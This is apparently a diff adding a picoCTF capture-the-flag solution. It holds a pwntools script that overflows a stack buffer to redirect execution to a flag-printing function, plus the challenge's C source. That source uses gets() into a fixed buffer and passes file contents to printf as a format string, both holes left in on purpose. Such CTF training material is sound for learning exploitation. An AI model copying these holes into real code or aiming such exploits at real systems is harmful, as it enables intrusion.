pwn/x_sixty_what

pwn/x_sixty_what/solve.py

@@ -0,0 +1,33 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -p python3 -i python3 python3Packages.pwntools
+
+from pwn import *
+
+exe = ELF("./vuln")
+
+context.binary = exe
+
+ADDR, PORT, *_ = "saturn.picoctf.net 63864".split()
+
+def conn():
+    if args.REMOTE:
+        r = remote(ADDR, PORT)
+    else:
+        r = process([exe.path])
+
+    return r
+
+def main():
+  r = conn()
+
+  print(r.recvuntil(b"Welcome to 64-bit. Give me a string that gets you the flag:"))
+  offset = 72 # found with pwndbg
+  print(f"flag: {hex(exe.sym.flag)}")
+  print(p64(exe.sym.flag))
+  payload = b'A' * offset + p64(exe.sym.flag + 5) # skip one instruction for some reason...
+  r.sendline(payload)
+  print(r.recvall())
+  r.close()
+
+if __name__ == "__main__":
+    main()

pwn/x_sixty_what/vuln.c

@@ -0,0 +1,37 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+
+#define BUFFSIZE 64
+#define FLAGSIZE 64
+
+void flag() {
+  char buf[FLAGSIZE];
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("%s %s", "Please create 'flag.txt' in this directory with your",
+                    "own debugging flag.\n");
+    exit(0);
+  }
+
+  fgets(buf,FLAGSIZE,f);
+  printf(buf);
+}
+
+void vuln(){
+  char buf[BUFFSIZE];
+  gets(buf);
+}
+
+int main(int argc, char **argv){
+
+  setvbuf(stdout, NULL, _IONBF, 0);
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+  puts("Welcome to 64-bit. Give me a string that gets you the flag: ");
+  vuln();
+  return 0;
+}
+